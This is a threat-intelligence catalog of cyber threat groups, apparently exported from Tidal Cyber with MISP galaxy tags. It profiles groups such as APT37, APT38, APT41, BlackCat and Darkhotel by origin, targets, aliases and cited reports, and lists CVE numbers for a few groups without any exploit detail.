[APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.<sup>[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]</sup><sup>[[Securelist ScarCruft Jun 2016](https://app.tidalcyber.com/references/04961952-9bac-48f3-adc7-40a3a2bcee84)]</sup><sup>[[Talos Group123](https://app.tidalcyber.com/references/bf8b2bf0-cca3-437b-a640-715f9cc945f7)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="APT37"

Stardust Chollima - Associated Group

<sup>[[CrowdStrike Stardust Chollima Profile April 2018](https://app.tidalcyber.com/references/a0119ad4-ceea-4dba-bc08-a682085a9b27)]</sup><sup>[[CrowdStrike GTR 2021 June 2021](https://app.tidalcyber.com/references/ec58e524-6de5-4cbb-a5d3-984b9b652f26)]</sup>

The tag is: misp-galaxy:groups="Stardust Chollima - Associated Group"

NICKEL GLADSTONE - Associated Group

<sup>[[SecureWorks NICKEL GLADSTONE profile Sept 2021](https://app.tidalcyber.com/references/c78a8379-04a4-4558-820d-831ad4f267fd)]</sup>

The tag is: misp-galaxy:groups="NICKEL GLADSTONE - Associated Group"

BeagleBoyz - Associated Group

<sup>[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]</sup>

The tag is: misp-galaxy:groups="BeagleBoyz - Associated Group"

Bluenoroff - Associated Group

<sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup>

The tag is: misp-galaxy:groups="Bluenoroff - Associated Group"

APT38

[APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.<sup>[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]</sup> Active since at least 2014, [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.<sup>[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]</sup><sup>[[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)]</sup><sup>[[DOJ North Korea Indictment Feb 2021](https://app.tidalcyber.com/references/d702653f-a9da-4a36-8f84-97caeb445266)]</sup><sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="APT38"

ITG07 - Associated Group

<sup>[[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)]</sup><sup>[[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)]</sup><sup>[[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]</sup>

The tag is: misp-galaxy:groups="ITG07 - Associated Group"

Chafer - Associated Group

Activities associated with APT39 largely align with a group publicly referred to as Chafer.<sup>[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)]</sup><sup>[[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)]</sup><sup>[[Dark Reading APT39 JAN 2019](https://app.tidalcyber.com/references/b310dfa4-f4ee-4a0c-82af-b0fdef1a1f58)]</sup><sup>[[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)]</sup><sup>[[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)]</sup><sup>[[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]</sup>

The tag is: misp-galaxy:groups="Chafer - Associated Group"

Remix Kitten - Associated Group

The tag is: misp-galaxy:groups="Remix Kitten - Associated Group"

APT39

[APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.<sup>[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)]</sup><sup>[[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)]</sup><sup>[[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)]</sup><sup>[[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)]</sup><sup>[[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]</sup>

The tag is: misp-galaxy:groups="APT39"

Wicked Panda - Associated Group

The tag is: misp-galaxy:groups="Wicked Panda - Associated Group"

APT41

[APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group]([FireEye APT41 Aug 2019(https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)]</sup><sup>[[Group IB APT 41 June 2021](https://app.tidalcyber.com/references/a2bf43a0-c7da-4cb9-8f9a-b34fac92b625)]</sup>

The tag is: misp-galaxy:groups="APT41"

Blind Eagle - Associated Group

The tag is: misp-galaxy:groups="Blind Eagle - Associated Group"

APT-C-36

[APT-C-36](https://app.tidalcyber.com/groups/153c14a6-31b7-44f2-892e-6d9fdc152267) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.<sup>[[QiAnXin APT-C-36 Feb2019](https://app.tidalcyber.com/references/cae075ea-42cb-4695-ac66-9187241393d1)]</sup>

The tag is: misp-galaxy:groups="APT-C-36"

Aquatic Panda

[Aquatic Panda](https://app.tidalcyber.com/groups/b8a349a6-cde1-4d95-b20f-44c62bbfc786) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://app.tidalcyber.com/groups/b8a349a6-cde1-4d95-b20f-44c62bbfc786) has primarily targeted entities in the telecommunications, technology, and government sectors.<sup>[[CrowdStrike AQUATIC PANDA December 2021](https://app.tidalcyber.com/references/fd095ef2-6fc2-4f6f-9e4f-037b2a9217d2)]</sup>

The tag is: misp-galaxy:groups="Aquatic Panda"

Group 72 - Associated Group

The tag is: misp-galaxy:groups="Group 72 - Associated Group"

Axiom

[Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) and [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.<sup>[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)]</sup><sup>[[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)]</sup><sup>[[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]</sup>

The tag is: misp-galaxy:groups="Axiom"

BackdoorDiplomacy

[BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.<sup>[[ESET BackdoorDiplomacy Jun 2021](https://app.tidalcyber.com/references/127d4b10-8d61-4bdf-b5b9-7d86bbc065b6)]</sup>

The tag is: misp-galaxy:groups="BackdoorDiplomacy"

BianLian Ransomware Group

BianLian is an extortion-focused threat actor group. The group originally used double-extortion methods when it began its operations in June 2022, demanding payment in exchange for decrypting locked files while also threatening to leak exfiltrated data. U.S. & Australian cybersecurity officials observed BianLian actors shifting almost exclusively to exfiltration-focused extortion schemes in 2023.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

Related Vulnerabilities: CVE-2020-1472<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, CVE-2021-34473<sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>, CVE-2021-34523<sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>, CVE-2021-31207<sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>

The tag is: misp-galaxy:groups="BianLian Ransomware Group"

T-APT-17 - Associated Group

<sup>[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]</sup>

The tag is: misp-galaxy:groups="T-APT-17 - Associated Group"

BITTER

[BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.<sup>[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]</sup><sup>[[Forcepoint BITTER Pakistan Oct 2016](https://app.tidalcyber.com/references/9fc54fb0-b7d9-49dc-b6dd-ab4cb2cd34fa)]</sup>

The tag is: misp-galaxy:groups="BITTER"

Bl00dy Ransomware Gang

Bl00dy self-identifies as a ransomware group. It gained attention in May 2023 for a series of data exfiltration and encryption attacks against education entities in the United States that featured exploit of vulnerabilities in PaperCut print management software, which is prevalent in the sector.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

Related Vulnerabilities: CVE-2023-27350<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The tag is: misp-galaxy:groups="Bl00dy Ransomware Gang"

BlackCat Ransomware Actors & Affiliates

This object represents the BlackCat/ALPHV Ransomware-as-a-Service (“RaaS”) apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects.

Researchers first observed BlackCat ransomware (AKA ALPHV or Noberus) in November 2021. An April 2022 U.S. FBI advisory linked BlackCat’s developers and money launderers to the defunct Blackmatter and Darkside ransomware operations (the latter was responsible for the major 2021 Colonial Pipeline incident).<sup>[[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)]</sup> As of September 2023, BlackCat is believed to be responsible for attacking organizations globally and in virtually every major sector, and it consistently claims some of the highest victim tallies of any RaaS. According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, BlackCat actors publicly claimed 233 victims in 2022, the third most of any ransomware operation in the dataset (considerably below Clop (558) but well above Hive (181)), and it already surpassed that number by July of 2023.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup> Like many RaaS, BlackCat actors threaten to leak exfiltrated victim data, but they also threaten to carry out denial of service attacks if victims do not pay timely ransoms.<sup>[[BlackBerry BlackCat Threat Overview](/references/59f98ae1-c62d-460f-8d2a-9ae287b59953)]</sup>

BlackCat developers have regularly evolved the namesake ransomware over time, and collaboration with affiliates means that a large number and variety of tools & TTPs are observed during intrusions involving BlackCat. BlackCat became the first prominent ransomware family to transition to the Rust programming language in 2022, which researchers assess provides greater customization and defense evasion capabilities and faster performance.<sup>[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)]</sup><sup>[[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)]</sup> A BlackCat variant named Sphynx emerged in early 2023, featuring multiple defense evasion-focused enhancements. In Q3 2023, public reports suggested that Scattered Spider (AKA 0ktapus or UNC3944), a group attributed to several prominent intrusions involving telecommunications, technology, and casino entities, had begun to use BlackCat/Sphynx ransomware during its operations.<sup>[[Caesars Scattered Spider September 13 2023](/references/6915c003-7c8b-451c-8fb1-3541f00c14fb)]</sup><sup>[[BushidoToken Scattered Spider August 16 2023](/references/621a8320-0e3c-444f-b82a-7fd4fdf9fb67)]</sup>

The tag is: misp-galaxy:groups="BlackCat Ransomware Actors & Affiliates"

BlackOasis

[BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. <sup>[[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)]</sup> <sup>[[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]</sup> A group known by Microsoft as [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is reportedly associated closely with [BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) operations, but evidence that the group names are aliases has not been identified. <sup>[[CyberScoop BlackOasis Oct 2017](https://app.tidalcyber.com/references/a8224ad5-4688-4382-a3e7-1dd3ed74ebce)]</sup>

The tag is: misp-galaxy:groups="BlackOasis"

Palmerworm - Associated Group

The tag is: misp-galaxy:groups="Palmerworm - Associated Group"

Temp.Overboard - Associated Group

<sup>[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]</sup>

The tag is: misp-galaxy:groups="Temp.Overboard - Associated Group"

Circuit Panda - Associated Group

<sup>[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]</sup>

The tag is: misp-galaxy:groups="Circuit Panda - Associated Group"

Radio Panda - Associated Group

<sup>[[U.S. CISA BlackTech September 27 2023](/references/309bfb48-76d1-4ae9-9c6a-30b54658133c)]</sup>

The tag is: misp-galaxy:groups="Radio Panda - Associated Group"

BlackTech

[BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia—​particularly Taiwan, Japan, and Hong Kong—​and the US since at least 2013. [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.<sup>[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)]</sup><sup>[[Symantec Palmerworm Sep 2020](https://app.tidalcyber.com/references/84ecd475-8d3f-4e7c-afa8-2dff6078bed5)]</sup><sup>[[Reuters Taiwan BlackTech August 2020](https://app.tidalcyber.com/references/77293f88-e336-4786-b042-7f0080bbff32)]</sup>

The tag is: misp-galaxy:groups="BlackTech"

Blue Mockingbird

[Blue Mockingbird](https://app.tidalcyber.com/groups/b82c6ed1-c74a-4128-8b4d-18d1e17e1134) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.<sup>[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)]</sup>

The tag is: misp-galaxy:groups="Blue Mockingbird"

REDBALDKNIGHT - Associated Group

The tag is: misp-galaxy:groups="REDBALDKNIGHT - Associated Group"

Tick - Associated Group

The tag is: misp-galaxy:groups="Tick - Associated Group"

BRONZE BUTLER

[BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.<sup>[[Trend Micro Daserf Nov 2017](https://app.tidalcyber.com/references/4ca0e6a9-8c20-49a0-957a-7108083a8a29)]</sup><sup>[[Secureworks BRONZE BUTLER Oct 2017](https://app.tidalcyber.com/references/c62d8d1a-cd1b-4b39-95b6-68f3f063dacf)]</sup><sup>[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]</sup>

The tag is: misp-galaxy:groups="BRONZE BUTLER"

Anunak - Associated Group

The tag is: misp-galaxy:groups="Anunak - Associated Group"

Chimera

[Chimera](https://app.tidalcyber.com/groups/ca93af75-0ffa-4df4-b86a-92d4d50e496e) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.<sup>[[Cycraft Chimera April 2020](https://app.tidalcyber.com/references/a5a14a4e-2214-44ab-9067-75429409d744)]</sup><sup>[[NCC Group Chimera January 2021](https://app.tidalcyber.com/references/70c217c3-83a2-40f2-8f47-b68d8bd4cdf0)]</sup>

The tag is: misp-galaxy:groups="Chimera"

Threat Group 2889 - Associated Group

The tag is: misp-galaxy:groups="Threat Group 2889 - Associated Group"

TG-2889 - Associated Group

The tag is: misp-galaxy:groups="TG-2889 - Associated Group"

Cleaver

[Cleaver](https://app.tidalcyber.com/groups/c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. <sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup> Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). <sup>[[Dell Threat Group 2889](https://app.tidalcyber.com/references/de7003cb-5127-4fd7-9475-d69e0d7f5cc8)]</sup>

The tag is: misp-galaxy:groups="Cleaver"

GOLD KINGSWOOD - Associated Group

<sup>[[Secureworks GOLD KINGSWOOD September 2018](https://app.tidalcyber.com/references/cda529b2-e152-4ff0-a6b3-d0305b09fef9)]</sup>

The tag is: misp-galaxy:groups="GOLD KINGSWOOD - Associated Group"

Cobalt Gang - Associated Group

<sup>[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)]</sup> <sup>[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]</sup><sup>[[Morphisec Cobalt Gang Oct 2018](https://app.tidalcyber.com/references/0a0bdd4b-a680-4a38-967d-3ad92f04d619)]</sup>

The tag is: misp-galaxy:groups="Cobalt Gang - Associated Group"

Cobalt Spider - Associated Group

<sup>[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]</sup>

The tag is: misp-galaxy:groups="Cobalt Spider - Associated Group"

Cobalt Group

[Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.<sup>[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)]</sup><sup>[[PTSecurity Cobalt Group Aug 2017](https://app.tidalcyber.com/references/f4ce1b4d-4f01-4083-8bc6-931cbac9ac38)]</sup><sup>[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)]</sup><sup>[[Group IB Cobalt Aug 2017](https://app.tidalcyber.com/references/2d9ef1de-2ee6-4500-a87d-b55f83e65900)]</sup><sup>[[Proofpoint Cobalt June 2017](https://app.tidalcyber.com/references/c4922659-88b2-4311-9c9b-dc9b383d746a)]</sup><sup>[[RiskIQ Cobalt Nov 2017](https://app.tidalcyber.com/references/ebf961c5-bd68-42f3-8fd3-000946c7ae9c)]</sup><sup>[[RiskIQ Cobalt Jan 2018](https://app.tidalcyber.com/references/7d48b679-d44d-466e-b12b-16f0f9858d15)]</sup> Reporting indicates there may be links between [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and both the malware [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) and the group [Carbanak]([Europol Cobalt Mar 2018(https://app.tidalcyber.com/references/f9d1f2ab-9e75-48ce-bcdf-b7119687feef)]</sup>

The tag is: misp-galaxy:groups="Cobalt Group"

Confucius APT - Associated Group

The tag is: misp-galaxy:groups="Confucius APT - Associated Group"

Confucius

[Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) and [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a), particularly in their respective custom malware code and targets.<sup>[[TrendMicro Confucius APT Feb 2018](https://app.tidalcyber.com/references/d1d5a708-75cb-4d41-b2a3-d035a14ac956)]</sup><sup>[[TrendMicro Confucius APT Aug 2021](https://app.tidalcyber.com/references/5c16aae9-d253-463b-8bbc-f14402ce77e4)]</sup><sup>[[Uptycs Confucius APT Jan 2021](https://app.tidalcyber.com/references/d74f2c25-cd53-4587-b087-7ba0b8427dc4)]</sup>

The tag is: misp-galaxy:groups="Confucius"

CopyKittens

[CopyKittens](https://app.tidalcyber.com/groups/6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.<sup>[[ClearSky CopyKittens March 2017](https://app.tidalcyber.com/references/f5a42615-0e4e-4d43-937d-05d2efe636cf)]</sup><sup>[[ClearSky Wilted Tulip July 2017](https://app.tidalcyber.com/references/50233005-8dc4-4e91-9477-df574271df40)]</sup><sup>[[CopyKittens Nov 2015](https://app.tidalcyber.com/references/04e3ce40-5487-4931-98db-f55da83f412e)]</sup>

The tag is: misp-galaxy:groups="CopyKittens"

CURIUM

[CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.<sup>[[Microsoft Iranian Threat Actor Trends November 2021](https://app.tidalcyber.com/references/78d39ee7-1cd5-5cb8-844a-1c3649e367a1)]</sup>

The tag is: misp-galaxy:groups="CURIUM"

CyberAv3ngers

CyberAv3ngers is a cyber actor group that has claimed responsibility for numerous disruption-focused attacks against critical infrastructure organizations, including an oil refinery and electric utility in Israel and water/wastewater utilities in the United States. According to a joint advisory released by U.S. & Israeli cybersecurity authorities in December 2023, CyberAv3ngers (aka Cyber Av3ngers or Cyber Avengers) is a “cyber persona” of advanced persistent threat actors affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). The advisory detailed how suspected CyberAv3ngers actors compromised programmable logic controller (PLC) devices that were exposed to the internet and used the vendor’s default passwords and ports, leaving defacement images and possibly rendering the devices inoperable. The defacement messages suggested that the group or affiliates might carry out attacks against other technological equipment produced in or associated with Israel.<sup>[[U.S. CISA IRGC-Affiliated PLC Activity December 2023](/references/51a18523-5276-4a67-8644-2bc6997d043c)]</sup>

The tag is: misp-galaxy:groups="CyberAv3ngers"

Daixin Team

Daixin Team is a ransomware- and data extortion-focused threat group first observed in mid-2022. Daixin Team is known to publicly extort its victims to pressure them into paying a ransom. It has used ransomware (believed to be based on the leaked source code for Babuk Locker) to encrypt victim data and has also exfiltrated sensitive data from victim environments and threatened to publicly leak that data.

Many of Daixin Team’s victims belong to critical infrastructure sectors, especially the Healthcare and Public Health (“HPH”) sector. An October 2022 joint Cybersecurity Advisory noted Daixin Team attacks on multiple U.S. HPH organizations.<sup>[[U.S. CISA Daixin Team October 2022](/references/cbf5ecfb-de79-41cc-8250-01790ff6e89b)]</sup> Alleged victims referenced on the threat group’s extortion website belong to the healthcare, utilities, transportation (airline), automobile manufacturing, information technology, retail, and media sectors in the United States, Europe, and Asia.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

The tag is: misp-galaxy:groups="Daixin Team"

Dark Caracal

[Dark Caracal](https://app.tidalcyber.com/groups/7ad94dbf-9909-42dd-8b62-a435481bdb14) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. <sup>[[Lookout Dark Caracal Jan 2018](https://app.tidalcyber.com/references/c558f5db-a426-4041-b883-995ec56e7155)]</sup>

The tag is: misp-galaxy:groups="Dark Caracal"

DUBNIUM - Associated Group

The tag is: misp-galaxy:groups="DUBNIUM - Associated Group"

Darkhotel

[Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group’s name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.<sup>[[Kaspersky Darkhotel](https://app.tidalcyber.com/references/3247c03a-a57c-4945-9b85-72a70719e1cd)]</sup><sup>[[Securelist Darkhotel Aug 2015](https://app.tidalcyber.com/references/5a45be49-f5f1-4d5b-b7da-0a2f38194ec1)]</sup><sup>[[Microsoft Digital Defense FY20 Sept 2020](https://app.tidalcyber.com/references/cdf74af5-ed71-4dfd-bc49-0ccfa40b65ea)]</sup>

The tag is: misp-galaxy:groups="Darkhotel"

DarkHydrus

[DarkHydrus](https://app.tidalcyber.com/groups/f2b31240-0b4a-4fa4-82a4-6bb00e146e75) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. <sup>[[Unit 42 DarkHydrus July 2018](https://app.tidalcyber.com/references/800279cf-e6f8-4721-818f-46e35ec7892a)]</sup> <sup>[[Unit 42 Playbook Dec 2017](https://app.tidalcyber.com/references/9923f9ff-a7b8-4058-8213-3c83c54c10a6)]</sup>

